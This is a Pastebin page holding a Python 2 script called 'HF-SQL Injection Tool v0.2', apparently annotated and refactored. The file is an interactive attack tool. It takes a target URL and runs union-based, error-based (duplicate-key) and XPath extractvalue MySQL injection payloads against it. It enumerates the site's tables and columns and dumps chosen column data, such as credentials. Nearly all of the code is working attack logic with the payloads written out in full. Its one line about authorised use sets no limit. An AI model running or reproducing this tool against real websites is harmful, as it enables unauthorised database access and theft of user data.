HF-SQL Injection Tool v0.2

a guest
Jun 29th, 2012
296
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 21.37 KB | None | 0 0
  1. #!/usr/bin/python
  2. '''         A Simple MySQL Injection Tool
  3.   +---------------------------------------------+
  4.   | Coded by : 5K0N4                            |                
  5.   | version : 07:17 AM, June 30, 2012 (v0.2)   |
  6.   | bugs & suggestions : Kaiji-kun@hotmail.com  |
  7.   + --------------------------------------------+
  8.                                               '''
  9. from bs4 import BeautifulSoup
  10. import urllib, urllib2, re, webbrowser, sys, os, time, string
  11.  
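class App(object):
    '''Interactive helper for three MySQL injection techniques - union based,
    error based (duplicate-key trick) and XPath (extractvalue) based - run
    against a URL the operator types in.

    Every payload is a SQL fragment concatenated onto that URL and sent as a
    plain GET through _fetch(); nothing is parameterised or URL-encoded, by
    design, because sending raw SQL is the whole point.  Table and column names
    the operator enters are spliced into the payloads as typed, so spaces, '&'
    or '#' in them will break the request.  Only run this against targets you
    are explicitly authorised to test.

    The target URL is kept in self.site after Routine(); the module-level
    ``site`` global is still written for code that read it in older versions.
    '''

    # Per-request timeout in seconds.  urllib.urlopen (used before) had none,
    # so a stalled target hung the tool forever.
    TIMEOUT = 15
    # ORDER BY probes 2..29, table enumeration rows 0..70, column/data rows
    # 0..22 - the same bounds the original loops used.
    MAX_ORDER_BY = 30
    MAX_TABLES = 71
    MAX_ROWS = 23
    # Patterns whose removal turns repr()'d scrape results into readable text.
    _TAG_SUBS = ('<.*?>', '<[^<]+?>', '<[^>]*>', r'\\n', "'", '\\\\')
    # Last quoted token of the page text when an enumeration query produced
    # no row (artefacts of repr()-ing BeautifulSoup's text-node list).
    _END_MARKERS = ('\n', '\\n', ', u')
    # Substrings that suggest the back end echoed a MySQL error.  "Error" and
    # "SQL" are very weak signals on their own, hence the baseline comparison
    # in _column_count().
    _ERROR_MARKERS = ("You have an error", "Unknown column", "Error", "SQL")

    def __init__(self):
        # Set by Routine(); every attack method calls Routine() first.
        self.site = None

    # ------------------------------------------------------------------ utils

    def Clean(self):
        '''Clear the terminal.

        Anything that is not win32 gets ``clear``: Python 2 reports Linux as
        ``linux2`` (and macOS as ``darwin``), which the old equality test missed,
        leaving the command name unbound.
        '''
        os.system('cls' if sys.platform == 'win32' else 'clear')

    @staticmethod
    def _looks_like_site(text):
        '''Cheap sanity check on the typed target.

        The original expression ``'www' and 'http://' and '.' not in site``
        only ever evaluated its last operand, so "contains a dot" is the check
        callers actually got; it is kept explicitly here.
        '''
        return '.' in text

    @staticmethod
    def _normalize_site(raw):
        '''Turn what the operator typed into the injectable base URL.

        - prefixes ``http://`` when no scheme was given
        - turns every ``=`` into ``=-`` so the first probe asks for a
          non-existent row (UnionBased flips this back for the ORDER BY step)
        - drops a trailing ``/*`` or ``#`` comment the operator may have pasted

        The suffix removal uses slicing on purpose: ``rstrip('/*')`` strips
        *characters*, so it also ate every trailing ``/`` of ``http://x//*``.
        '''
        target = raw.strip()
        if not target.startswith('http'):
            target = 'http://' + target
        target = target.replace('=', '=-')
        for suffix in ('/*', '#'):
            if target.endswith(suffix):
                target = target[:-len(suffix)]
        return target

    def Routine(self):
        '''Prompt for the target URL, normalise it and store it in self.site
        (and the module global ``site``).  Typing ``exit`` quits the program.

        Returns the normalised URL.
        '''
        global site
        print("Enter the site:")
        raw = raw_input(">>> ")
        while raw != 'exit' and not self._looks_like_site(raw):
            print("[!] Please enter a valid site!")
            raw = raw_input(">>> ")
            print("[=============================]")
        if raw == 'exit':
            sys.exit()
        site = self._normalize_site(raw)
        self.site = site
        return site

    def _fetch(self, url):
        '''GET ``url`` and return the response body as a str ('' on failure).

        An HTTP error status is not a failure here: a 500 page is exactly where
        the MySQL error text the detectors look for tends to live, so its body
        is returned too (this mirrors urllib.urlopen, which never raised on
        status).  Connection errors and timeouts are reported and yield ''.
        '''
        try:
            return urllib2.urlopen(url, timeout=self.TIMEOUT).read()
        except urllib2.HTTPError as err:
            return err.read()
        except IOError as err:  # URLError and socket.timeout are both IOErrors
            print(" [!] Request failed for %s: %s" % (url, err))
            return ''

    @staticmethod
    def _page_text(html):
        '''Collapse ``html`` to the repr of its text nodes, with leftover tags
        removed.

        The result is a *list repr* such as ``['a', 'b']``; the quote-based
        regexes and the ``', u'`` sentinel in the enumeration loops rely on
        exactly that shape, so it is kept rather than switching to get_text().
        '''
        nodes = BeautifulSoup("".join(html)).findAll('', text=True)
        return re.sub('<[^<]+?>', '', str(nodes))

    @classmethod
    def _untag(cls, text):
        '''Strip tags, repr() newline escapes, quotes and backslashes from
        ``text`` (the cleanup every "Found:" line went through).'''
        for pattern in cls._TAG_SUBS:
            text = re.sub(pattern, '', text)
        return text

    @classmethod
    def _comma_lists(cls, html):
        '''Return the comma-separated identifier lists found in ``html`` (the
        output of a group_concat() column) flattened to one readable string.

        Anything on the page that looks like ``a, b, c`` matches too, so the
        result can include bits of unrelated page text.
        '''
        found = re.findall(r"(\w+\s*,\s*\w+\s*(?:,\s*\w+\s*)*)", html)
        return cls._untag(str(found)).strip('[').strip(']')

    @classmethod
    def _error_markers(cls, text):
        '''Return the set of _ERROR_MARKERS substrings present in ``text``.'''
        return set(marker for marker in cls._ERROR_MARKERS if marker in text)

    @staticmethod
    def _hex(text):
        '''Hex-encode ``text`` byte by byte - what ``str.encode('hex')`` did on
        Python 2 - so a name can go into a payload as a quote-free 0x literal.'''
        return ''.join('%02x' % ord(ch) for ch in text)

    @staticmethod
    def _replace_column(columns, chosen):
        '''Return ``columns`` with the entry equal to ``chosen`` swapped for
        ``@@version``.  Exact-element matching matters: str.replace also hit
        the '1' inside '10', '11', ... and corrupted the SELECT list.'''
        return ['@@version' if col == chosen else col for col in columns]

    @staticmethod
    def _union_version_lines(html):
        '''Guess the MySQL major version from a page that echoes @@version.

        Purely substring based ("5.0", "4.0", "5.1.") and therefore easily
        fooled by any other number on the page; the original used unescaped
        regexes whose matches could never equal the compared literal for the
        4.x branch, so that branch was dead.
        '''
        lines = []
        if '5.0' in html:
            lines.append("DB Server: MySQL >=5")
        if '4.0' in html:
            lines.append("DB Server: MySQL >=4")
        if '5.1.' in html:
            lines.append("DB Server: MySQL >=5.1")
        return lines

    def _column_count(self, probe_site):
        '''Return the column count found with ``ORDER BY n`` probes, or None.

        Markers already present on the unmodified page (a template that says
        "Error" in its footer, say) are subtracted from every probe, otherwise
        the very first probe would always "succeed".
        '''
        baseline = self._error_markers(self._page_text(self._fetch(probe_site)))
        for n in range(2, self.MAX_ORDER_BY):
            text = self._page_text(self._fetch(probe_site + '+order+by+%s--' % n))
            if self._error_markers(text) - baseline:
                return n - 1
        return None

    def _error_rows(self, build_url, count, pattern, group):
        '''Yield one leaked value per row for an error-based payload.

        ``build_url(i)`` gives the URL that leaks row ``i``; ``pattern`` is the
        regex whose ``group`` holds the value inside MySQL's "Duplicate entry"
        message.  Stops when the pattern no longer matches (nothing leaked -
        the original crashed with AttributeError here) or when the page text
        ends in one of the _END_MARKERS sentinels.
        '''
        for i in range(count):
            html = self._fetch(build_url(i))
            hit = re.search(pattern, html)
            if hit is None:
                return
            quoted = re.findall("'([^']*)'", self._page_text(re.sub('~1', '', html)))
            if quoted and quoted[-1] in self._END_MARKERS:
                return
            yield hit.group(group)

    def _xpath_rows(self, build_url, count, pattern):
        '''Yield the regex match for each row leaked through an XPath error.

        Stops as soon as a page shows a plain syntax error ("You have an"),
        no longer shows the XPATH error, or ``pattern`` does not match.
        '''
        for i in range(count):
            html = self._fetch(build_url(i))
            if re.search('You have an', html) or not re.search('XPATH', html):
                return
            hit = re.search(pattern, html)
            if hit is None:
                return
            yield hit

    # ---------------------------------------------------------------- attacks

    def UnionBased(self):
        '''Union-based extraction.

        Finds the column count with ORDER BY, shows which columns are echoed
        into the page, then pulls @@version, the table list, the column list of
        a chosen table and finally two chosen columns via group_concat().
        '''
        print("")
        print(" [Union Based]")
        print("---------------")
        self.Routine()
        print(" [!] Getting column count...")
        print("")
        # ORDER BY has to run against an existing row, so use the positive id.
        count = self._column_count(self.site.replace('=-', '='))
        if count is None:
            count = self.MAX_ORDER_BY - 2
            print(" [!] No error up to ORDER BY %d - assuming %d columns, results may be meaningless"
                  % (self.MAX_ORDER_BY - 1, count))
        else:
            print("Column count is: " + str(count))
        print("[==================]")
        print(" [!] Getting vulnerable columns...")
        columns = [str(n) for n in range(1, count + 1)]
        url = self.site + '+union+select+%s--' % ','.join(columns)
        html = self._fetch(url)
        # numbers that came back wrapped in a tag are the ones the page echoes
        echoed = [re.sub('<.*?>', '', m) for m in re.findall(r'<[^<]+?>\d+<[^<]+?>', html)]
        print("[====================]")
        print("Vulnerable Colums: " + ', '.join(echoed))
        print("")

        print("Select vulnerable column to test for db version:")
        chosen = raw_input(">>> ")
        if chosen in ('-n', 'n'):
            webbrowser.open(url, new=2)
        # base has no trailing '--'; every later query swaps @@version for
        # another expression and appends its own FROM clause.
        base = self.site + '+union+select+%s' % ','.join(self._replace_column(columns, chosen))
        for line in self._union_version_lines(self._fetch(base + '--')):
            print(line)

        print("")
        print(" [!] Getting Tables...")
        tables_url = (base.replace("@@version", "group_concat(table_name,0x0a)")
                      + '+from+information_schema.tables+where+table_schema=database()--')
        print("[====================]")
        print("Tables Found: " + self._comma_lists(self._fetch(tables_url)))
        print("")
        print("Enter the table to inject")
        table = raw_input('>>> ')
        if table in ('-n', 'n'):
            print("")
            print(" [!] Redirecting in browser...")
            print("[============================]")
            webbrowser.open(tables_url, new=2)
        # char(117,115,...) keeps the table name quote-free inside the payload
        encoded = ','.join(str(ord(ch)) for ch in table)
        columns_url = (base.replace("@@version", "group_concat(column_name,0x0a)")
                       + '+from+information_schema.columns+where+table_name=char(%s)--' % encoded)
        print("[====================]")
        print("Columns Found: " + self._comma_lists(self._fetch(columns_url)))
        print("")
        print("Enter the columns to inject")
        col1 = raw_input('Col #1 >>> ')
        col2 = raw_input('Col #2 >>> ')
        if col1 in ('-n', 'n') or col2 in ('-n', 'n'):
            print("")
            print("[!] Redirecting in browser...")
            print("[===========================]")
            webbrowser.open(columns_url, new=2)
        print("[===============================]")
        print(" [!] Getting data from columns...")
        # Format the expression *before* splicing it into the URL.  Applying
        # '%' to the whole URL afterwards (as before) raised on any
        # percent-encoded character the URL happened to contain.
        data_url = (base.replace('@@version', 'group_concat(%s,0x7e,%s)' % (col1, col2))
                    + '+from+%s--' % table)
        print(data_url)
        html = self._fetch(data_url)
        rows = re.findall("(.*?)~(.*?),(.*?)", html)
        if not rows:
            rows = re.findall("(.*?)~(.*)", html)
        print("[====================]")
        print("Data Found(%s,%s): %s" % (col1, col2, self._untag(str(rows))))
        print("[===================]")
        print("No more Data to dump!")
        print("[===================]")
        print("Hit ENTER to restart. \n'n' to redirect in browser for data search. \n'exit' to exit.")
        end = raw_input(">>> ")
        if end in ('-n', 'n'):
            webbrowser.open(data_url, new=2)
        elif end == 'exit':
            sys.exit()
        # anything else returns to the menu loop in main()

    def ErrorBased(self):
        '''Error-based extraction via the duplicate-key trick.

        ``group by concat(<value>, floor(rand(0)*2))`` makes MySQL raise
        "Duplicate entry '<value>~1'", and the value is scraped from that error
        text on the page.  One request per leaked row.
        '''
        print("")
        print(" [Error Based] ")
        print("---------------")
        self.Routine()
        print("[!] Trying Error Based Method...")
        # these payloads need the real row, so undo the '=-' from Routine()
        target = self.site.replace("=-", "=")
        text = self._page_text(self._fetch(
            target + '+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--'))
        if "Duplicate entry '5.1" in text:
            print("DB Server: MySQL >=5.1")
        elif "Duplicate entry '5" in text:
            print("DB Server: MySQL >=5")
        else:
            print("DB Server: MySQL >=4")

        html = self._fetch(target + '+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)')
        hit = re.search("'(.*?)~1'", html)
        if hit is None:
            print("")
            print("Website does not seem to be vulnerable to Error Based Method!")
            print("Restarting in 5...")
            time.sleep(5)
            return
        dbname = hit.group(1)
        print("")
        print("DB Name: " + dbname)
        print("")
        print(" [!] Getting tables from DB...")
        tables_fmt = target + '+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+%s,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)'
        for name in self._error_rows(lambda i: tables_fmt % i, self.MAX_TABLES, "'(.*?)~1'", 1):
            print("[============================]")
            print("Found table: " + name)
        print("[============================]")
        print(" [!] There are no more tables to find!")

        print("[=======================]")
        print("Enter the table to inject")
        table = raw_input(">>> ")
        table_hex = self._hex(table)
        columns_fmt = target + '+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x%s+limit+%s,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)'
        for name in self._error_rows(lambda i: columns_fmt % (table_hex, i), self.MAX_ROWS, "'(.*?)~1'", 1):
            print("[============================]")
            print("Found column: " + name)
        print("[============================]")
        print(" [!] There are no more columns to find!")

        print("[============================]")
        print("Enter the columns to inject")
        col1 = raw_input("Col #1 >>> ")
        col2 = raw_input("Col #2 >>> ")
        data_fmt = target + '+and(select+1+from(select+count(*),concat((select+(select(SELECT+concat(0x7e,0x27,cast(%s.%s+as+char),0x27,0x7e)+FROM+`%s`.%s+LIMIT+%s,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1'
        for column in (col1, col2):
            # default argument binds the current column for the lambda
            build = lambda i, c=column: data_fmt % (table, c, dbname, table, i)
            for value in self._error_rows(build, self.MAX_ROWS, "'(.*?)'~1'", 0):
                print("[============================]")
                print("Data from %s: %s" % (column, value))
            print("[============================]")
            print(" [!] There is no more data to dump from %s!" % column)
        print("No more Data to dump!")
        print("[===================]")
        print("Hit ENTER to restart.\n'exit' to exit.")
        if raw_input(">>> ") == 'exit':
            sys.exit()

    def Xpath(self):
        '''XPath-error extraction.

        ``extractvalue(rand(), <non-xpath>)`` makes MySQL echo the offending
        expression in an "XPATH syntax error" message; values are scraped
        from that.  Requires MySQL >= 5.1.  One request per leaked row.
        '''
        print("")
        print(" [XPath Injection] ")
        print("-------------------")
        self.Routine()
        target = self.site.replace("=-", "=")
        text = self._page_text(self._fetch(target + '+and+extractvalue(rand(),concat(0x7e,version()))--'))
        if "XPATH syntax" not in text:
            print(" [!] Website does not seem to be vulnerable to XPath!")
            print(" [!] Restarting in 5...")
            time.sleep(5)
            return
        print("DB Server: MySQL >=5.1")
        print("[=====================]")
        tables_fmt = target + '+and+extractvalue(rand(),concat(0x0a,(select+concat(0x3a,table_name)+from+information_schema.tables+WHERE+table_schema=database()+limit+%s,1)))--'
        for hit in self._xpath_rows(lambda i: tables_fmt % i, self.MAX_TABLES, r":\s'\n:(.*?)'"):
            print("Found table: " + hit.group(1))
            print("[=========================]")
        print("")
        print(" [!] There are no more tables to find!")
        print("[====================================]")

        print("Enter the table to inject ")
        table = raw_input(">>> ")
        table_hex = self._hex(table)
        columns_fmt = target + '+and+extractvalue(rand(),concat(0x0a,(select+concat(0x3a,column_name)+from+information_schema.columns+where+table_name=0x%s+limit+%s,1)))--+x'
        for hit in self._xpath_rows(lambda i: columns_fmt % (table_hex, i), self.MAX_ROWS, r":\s'\n:(.*?)'"):
            print("Found column: " + hit.group(1))
            print("[==========================]")
        print("")
        print(" [!] There are no more columns to find!")
        print("[=====================================]")

        print("Enter the columns to inject ")
        col1 = raw_input("Col #1>>> ")
        col2 = raw_input("Col #2>>> ")
        data_fmt = target + '+and+extractvalue(rand(),concat(0x3a,(select+concat(%s,0x3a,%s)+from+%s+limit+%s,1)))--+x'
        for hit in self._xpath_rows(lambda i: data_fmt % (col1, col2, table, i), self.MAX_ROWS, r":\s':(.*?):(.*?)'"):
            print("[-----------%s:%s------------]" % (col1, col2))
            print("Found Data" + hit.group())
            print("[==========================]")
        print("")
        print(" [!] There is no more data to dump!")
        print("[=================================]")
        print("No more Data to dump!")
        print("[===================]")
        print("Hit ENTER to restart.\n'exit' to exit.")
        if raw_input(">>> ") == 'exit':
            sys.exit()

    # ------------------------------------------------------------------- menu

    @staticmethod
    def _banner():
        '''Print the menu.'''
        print(" +========================+ ")
        print(" | SQLi TooL Version 0.2  | ")
        print(" | Help : -help           | ")
        print(" | Coded by : 5K0N4       | ")
        print(" +========================+ ")
        print(" +========================+ ")
        print(" |_____Choose Method______| ")
        print(" |-----[1]Union Based-----| ")
        print(" |---[2]XPath Injection---| ")
        print(" |-----[3]Error Based-----| ")
        print(" +========================+ ")

    @staticmethod
    def _help():
        '''Print the help text shown for -h / -help.'''
        print("=======================")
        print("Union Based: ")
        print("")
        print("If the program didn't find anything usefull you can \npress '-n' or 'n' to redirect in browser to seach manually!")
        print("[---------------------------------------------------------]")
        print("Also there's a bug in 'Tables Found:','Columns Found:' and 'Data Found:' - \nBeware that some of those won't be valid tables\\columns but html elements!")
        print("[------------------------------------------------------------------------]")
        print("Hit ENTER to restart")

    def main(self):
        '''Menu loop; only ``exit`` leaves it.

        Each attack method returns here when it finishes or when the target
        turns out not to be vulnerable.  The original "restarted" by
        recursively constructing a new App from inside the attack method,
        nesting one frame deeper on every round.
        '''
        actions = {'1': self.UnionBased, '2': self.Xpath, '3': self.ErrorBased}
        while True:
            self.Clean()
            self._banner()
            choice = raw_input(">>> ")
            while choice not in ('1', '2', '3', '-h', '-help', 'exit'):
                print("Please enter a valid option [-h for help]!")
                choice = raw_input(">>> ")
            if choice == 'exit':
                sys.exit()
            if choice in ('-h', '-help'):
                self._help()
                raw_input(">>> ")
                continue
            self.Clean()
            actions[choice]()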
  494.  
if __name__ == '__main__':
    # Script entry point: build one App and hand control to its menu.
    App().main()